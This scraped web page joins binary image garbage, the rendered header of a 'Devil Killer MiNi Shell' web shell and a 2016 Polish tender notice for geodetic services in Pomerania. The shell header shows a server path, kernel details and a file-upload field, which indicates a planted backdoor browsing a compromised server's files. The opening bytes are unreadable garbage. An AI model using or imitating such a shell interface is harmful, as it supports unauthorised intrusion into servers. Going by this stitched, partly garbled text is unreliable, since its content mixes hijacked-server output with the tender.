JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161104/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20161104/336225-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='www.anr.gov.pl' target='_blank'>www.anr.gov.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 336225 - 2016
              z dnia 2016-11-04 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Pruszcz Gdański: Usługi geodezyjno - kartograficzne na nieruchomościach wchodzących w skład Zasobu WRSP położonych na terenie województwa pomorskiego  5 zadań częściowych
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Agencja Nieruchomości Rolnych Oddział Terenowy w Gdańsku, krajowy numer identyfikacyjny
              , ul.
              ul. Powstańców Warszawy 
              28,
              83000  
              Pruszcz Gdański, woj.
              pomorskie, państwo
              Polska, tel.
              058 3004841, 3023817, e-mail
              , faks
              583 004 843.
              <br />
              Adres strony internetowej (URL): www.anr.gov.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Państwowa osoba prawna</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.anr.gov.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.anr.gov.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Oferty muszą być złożone w formie pisemnej<br />
                Adres:
                <br />ul. Powstańców Warszawy 28, 83-000 Pruszcz Gdański - Sekretariat</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Usługi geodezyjno - kartograficzne na nieruchomościach wchodzących w skład Zasobu WRSP położonych na terenie województwa pomorskiego  5 zadań częściowych
<br /><b>Numer referencyjny: </b>SOP-0160-44/16<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1. Przedmiotem zamówienia jest wykonanie usług geodezyjno - kartograficznych na nieruchomościach wchodzących w skład Zasobu Własności Rolnej Skarbu Państwa położonych na terenie powiatów: człuchowskiego, kościerskiego, chojnickiego, malborskiego, kwidzyńskiego, słupskiego, bytowskiego i starogardzkiego.
1.2  Zamówienie zostało podzielone na  5 części, w następujący sposób:
1.2.1	Część 1  Zadanie 1 polegające na:
1) podziale działki nr 89/17 o pow. 0,5006 ha położonej w obrębie Kiełpin Gm. Człuchów, pow. człuchowski na dwie działki;
2) podziale działki nr 249/2 o pow. 31,3278 ha położonej w obrębie Lisewo Gm. Przechlewo, pow. człuchowski na trzy działki;
3) wznowienie granic działki nr 500/7 o pow. 13,8215 ha położonej w obrębie Kiełpin Gm. Człuchów, pow. człuchowski;
4) wydzielenie z działki nr 363/1 o pow. 1,0800 ha położonej w obrębie Męcikał Gm. Brusy, pow. chojnicki użytku w stanowiącego wody płynące;
5) wydzielenie z działki nr 364 o pow. 0,1500 ha położonej w obrębie Męcikał Gm. Brusy, pow. chojnicki użytku w stanowiącego wody płynące;
6)wydzielenie z działki nr 363/3 o pow. 0,0700 ha położonej w obrębie Męcikał Gm. Brusy, pow. chojnicki użytku w stanowiącego wody płynące;
7) wydzielenie z działki nr 363/2 o pow. 0,0900 ha położonej w obrębie Męcikał Gm. Brusy, pow. chojnicki użytku w stanowiącego wody płynące;
8) wydzielenie z działki nr 196/6 o pow. 0,5598 ha położonej w obrębie Korne Gm. Kościerzyna, pow. kościerski użytku w stanowiącego wody płynące;
9) wydzielenie z działki nr 290/1 o pow. 10,9620 ha położonej w obrębie Jęczniki Wielkie Gm. Człuchów, pow. człuchowski działki poznaczonej pod ścieżkę  pieszo  rowerową;
10) wznowienie granic  działki nr 220/1 o pow. 0,1098 ha położonej w obrębie Pawłówko Gm. Przechlewo, pow. człuchowski;
11) wydzielenie z działki nr 306/14 o pow. 9,6137 ha położonej w obrębie Jęczniki Wielkie Gm. Człuchów, pow. człuchowski działki poznaczonej pod ścieżkę  pieszo  rowerową.

1.2.2	Część 2  Zadanie 2 polegające na:
1)zmianie klasyfikacji użytków Br-RIVb, Br-PsIV o łącznej pow. 0,8800 ha znajdujących  się na działce nr 80 położonej w obrębie Redęcin gmina Słupsk powiat słupski na aktualny użytek;
2)zmianie klasyfikacji użytku Br-RV o  pow. 0,1400 ha znajdującego się na działce nr 97/5 położonego w obrębie Redęcin gmina Słupsk powiat słupski na aktualny użytek;
3) zmianie klasyfikacji użytku Br-RIVa o  pow. 0,5400 ha znajdującego się na działce nr 108/5 położonego w obrębie Redęcin gmina Słupsk powiat słupski na aktualny użytek;
4) zmianie klasyfikacji użytku Br-RIIIa o  pow. 1,01 ha znajdującego się na działce nr 56/1 położonego w obrębie Sycewice gmina Słupsk powiat słupski na aktualny użytek;
5) zmianie klasyfikacji użytku dr o  pow. 0,0700 ha znajdującego się na działce nr 266 położonego w obrębie Redęcin gmina Słupsk powiat słupski na aktualny użytek;
6) zmianie klasyfikacji użytku dr o  pow. 0,6500 ha znajdującego się na działce nr 267/1  położonego w obrębie Redęcin gmina Słupsk powiat słupski na aktualny użytek;
7) podziale działki nr 84 o pow. 39,96 ha położonej w obrębie Redęcin gmina Słupsk powiat słupski na trzy działki;
8) podziale działki nr 108/5 o pow. 49,84 ha położonej w obrębie Redęcin gmina Słupsk powiat słupski na trzy działki;
9) podziale działki nr 56/1 o pow. 97/61 ha położonej w obrębie Sycewice gmina Kobylnica powiat słupski na trzy działki;
10) podziale działki nr 14 o pow. 18,43 ha położonej w obrębie Sycewice gmina Kobylnica powiat słupski na  trzy działki;
11) podziale działki nr 15 o pow. 6,84 ha położonej w obrębie Sycewice gmina Kobylnica powiat słupski na trzy działki;
12) wznowieniu granic działki nr 63 o pow. 0,24 ha położonej w obrębie Sycewice gmina Kobylnica powiat słupski;
13) wznowieniu granic działki nr 64 o pow. 0,15 ha położonej w obrębie Sycewice gmina Kobylnica powiat słupski;
14) podziale działki nr 20 o pow. 1,62 ha położonej w obrębie Wiszno gmina Damnica powiat słupski na dwie działki;
15) podziale działki nr 101/28 o pow. 0,1371 ha położonej w obrębie Dobrzęcino gmina Kobylnica powiat słupski na trzy działki;
16) podziale działki nr 101/29 o pow. 0,0616 ha położonej w obrębie Dobrzęcino gmina Kobylnica powiat słupski na dwie działki;
17) podziale działki nr 101/37 o pow. 0,0637 ha położonej w obrębie Dobrzęcino gmina Kobylnica powiat słupski na dwie działki;
18) zmianie klasyfikacji użytku Br-RV o  pow. 0,1400 ha znajdującego się na działce nr 97/5 położonego w obrębie Redęcin gmina Słupsk powiat słupski na aktualny użytek.

1.2.3   Część 3  Zadanie 3 polegające na:
1)podziale działki nr 19/2 o pow. 60,4472 ha położonej w obrębie Górki gmina Kwidzyn pow. kwidzyński na trzy działki;
2)podziale działki nr 17/22 o pow. 37,3557 ha położonej w obrębie Górki gmina Kwidzyn pow. kwidzyński na dwie działki;
3)wydzieleniu z  działki nr 8/34 o pow. 1,2413 ha położonej w obrębie Tragamin gmina Malbork pow. malborski przepompowni wraz z podziemnym betonowym zbiornikiem stanowiącym własność Gminy Malbork;
4)aktualizacji mapy sytuacyjno- wysokościowej oraz ewidencji gruntów działki 42/20 położonej w obrębie Nowy Staw gmina Nowy Staw pow. malborski;
5)podziale działki nr 2/58 o pow. 0,1441 ha położonej w obrębie Pronie gmina Stary Dzierzgoń pow. Sztumski na  trzy działki.

1.2.4	Część 4  Zadanie 4 polegające na:
1)podziale działki nr 123/2 o pow. 2,95 ha położonej w obrębie Węgorzynko Gm. Miastko, pow. bytowski  na dziewięć działek;
2)podziale działki nr 21/49 o pow. 1,1929 ha położonej w obrębie Suchorze Gm. Trzebielino, pow. bytowski na cztery działki;
3)podziale działki nr 219 o pow. 0,53 ha położonej w obrębie Gostkowo  Gm. Bytów, pow. bytowski na trzy działki;
4)wydzieleniu z działki nr 208 o pow. 1,4100 ha położonej w obrębie Kołczygłowy Gm. Kołczygłowy , pow. bytowski jednej działki stanowiącej poszerzenie drogi;
5)wydzieleniu z działki nr 240/2 o pow. 0,2600 ha położonej w obrębie Kołczygłowy Gm. Kołczygłowy , pow. bytowski jednej działki stanowiącej poszerzenie drogi;
6)podziale działki nr 162 o pow. 0,05 ha położonej w obrębie Rokitki Gm. Czarna Dąbrówka, pow. bytowski na dwie działki zgodnie z planem zagospodarowania przestrzennego oraz ustalenie linii brzegu z działką 99;
7)wydzieleniu z działki nr 143/3 o pow. 0,5000 ha położonej w obrębie Niezabyszewo Gm. Bytów, pow. bytowski jednej działki stanowiącej poszerzenie drogi;
8)wznowieniu granic  działki nr 92/2 o pow. 1,14 ha położonej w obrębie Rokitki Gm. Czarna Dąbrówka, pow. bytowski;
9)wznowieniu granic  działki nr 61 o pow. 0,0706 ha położonej w obrębie Barnowo Gm. Kołczygłowy, pow. bytowski;
10)wznowieniu granic  działki nr 413/1 o pow. 0,46 ha położonej w obrębie Gostkowo Gm. Bytów, pow. bytowski na odcinku z wodą płynącą oznaczona jako działka 396;
11)wznowieniu granic  działki nr 354 o pow. 0,93 ha położonej w obrębie Borzytuchom Gm. Borzytuchom, pow. bytowski na odcinku z wodą płynącą oznaczona jako działka 522/1. 

1.2.5	Część 5  Zadanie 5 polegające na:
1)podziale działki nr 28/1 o pow. 50,5255 ha położonej w obrębie Mirowo Gm. Skarszewy, pow. starogardzki na dwie  działki;
2)podziale działki nr 30/26 o pow. 22,2978 ha położonej w obrębie Mirowo Gm. Skarszewy, pow. starogardzki na dwie działki;
3)podziale działki nr 47/23 o pow. 18,9168 ha położonej w obrębie Mirowo Gm. Skarszewy, pow. starogardzki na dwie działki;
4)podziale działki nr 56/10 o pow. 71/5370 ha położonej w obrębie Mirowo Gm. Skarszewy, pow. starogardzki na dwie działki;
5)przygotowaniu projektu podziału około 70 działek przeznaczonych pod ogródki działkowe wraz z ich stabilizacją palikami na działkach nr 20/56, 20/53, 65/1 240/2 o łącznej pow. 3,8632 ha położonych w obrębie Jabłowo Gm. Starogard gdański , pow. starogardzki.
1.3 Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego zostały zawarte w projekcie umowy stanowiącym załącznik nr 8 do SIWZ.
<br /><br /><b>II.5) Główny kod CPV: </b>71250000-5<br /><b> Dodatkowe kody CPV:</b>71251000-2,
                71355000-1<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 150<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie stawia szczególnych wymagań w tym zakresie<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie stawia szczególnych wymagań w tym zakresie<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Niniejszy warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że: 
1)składając ofertę na zadanie 1, 3, 4 i 5 dysponuje osobą skierowaną do realizacji zamówienia, posiadającą następujące kwalifikacje:
a) co najmniej jedną osobą posiadającą świadectwo nadania uprawnień w dziedzinie geodezji i kartografii na podstawie art. 45 ust. 2 ustawy z dnia 17 maja 1989 r.  Prawo geodezyjne i kartograficzne (Dz.U. z 2015 r. poz. 520 ze zm.) w zakresie: geodezyjne pomiary sytuacyjno-wysokościowe, realizacyjne i inwentaryzacyjne oraz rozgraniczenia i podziały nieruchomości (gruntów) oraz sporządzanie dokumentacji do celów prawnych; 
2) składając ofertę na zadanie 2 dysponuje osobą skierowaną do realizacji zamówienia, posiadającą następujące kwalifikacje tj.
a) co najmniej jedną osobą posiadającą świadectwo nadania uprawnień w dziedzinie geodezji i kartografii na podstawie art. 45 ust. 2 ustawy z dnia 17 maja 1989 r.  Prawo geodezyjne i kartograficzne (Dz.U. z 2015 r. poz. 520 ze zm.) w zakresie: geodezyjne pomiary sytuacyjno-wysokościowe, realizacyjne i inwentaryzacyjne oraz rozgraniczenia i podziały nieruchomości (gruntów) oraz sporządzanie dokumentacji do celów prawnych,
b) co najmniej jedną osobą posiadającą upoważnienie do przeprowadzenia klasyfikacji gleboznawczej gruntów z co najmniej 3 letnim doświadczeniem zawodowym liczonym od dnia uzyskania upoważnienia.
Osoby będące obywatelami krajów członkowskich Unii Europejskiej, a wskazane jako eksperci, od których wymagane są stosowne uprawnienia zawodowe, powinny posiadać decyzję w sprawie uznania wymaganych kwalifikacji do wykonywania w Rzeczypospolitej Polskiej samodzielnych funkcji w dziedzinie geodezji i kartografii w zakresie przedmiotu niniejszego zamówienia  zgodnie z ustawą z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. 2016 poz. 65).



3) składając ofertę na zadanie 1, 2 i 4:
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej 6 podziałów nieruchomości rolnych powyżej 5 ha każdy z podaniem przedmiotu (nr KERG,  obrębu i numeru działki), dat wykonania i podmiotów, na rzecz których usługi zostały wykonane;
4) składając ofertę na zadanie 3 i 5:
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej 2 podziały nieruchomości rolnej powyżej 10 ha każdy z podaniem przedmiotu (nr KERG,  obrębu i numeru działki), dat wykonania i podmiotów, na rzecz których usługi zostały wykonane;
W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców warunek zostanie uznany za spełniony, jeżeli jeden z wykonawców wykaże się całym wymaganym doświadczeniem. Zamawiający nie uzna warunku za spełniony, jeżeli wszyscy uczestnicy w sumie wykażą się wymaganym doświadczeniem, ale żaden z nich indywidualnie nie wykaże się całym wymaganym doświadczeniem.  <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1)wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, o których mowa w ust 1.2.3 pkt 1) lit. a) części II SIWZ, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami (wzór dokumentu zawarty jest w Załączniku nr 5 do SIWZ);
2) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, o których mowa w ust 1.2.3 pkt 2) lit. a) i b) części II SIWZ, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami (wzór dokumentu zawarty jest w Załączniku nr 5 do SIWZ);
3) wykaz usług (z wykorzystaniem wzoru stanowiącego załącznik nr 6 do SIWZ) wykonanych w okresie ostatnich 3 lat przed upływem  terminu składania ofert, a jeżeli okres prowadzenia działalności krótszy  w tym okresie, wraz z  podaniem ich wartości, przedmiotu dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz  załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, 
a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; 
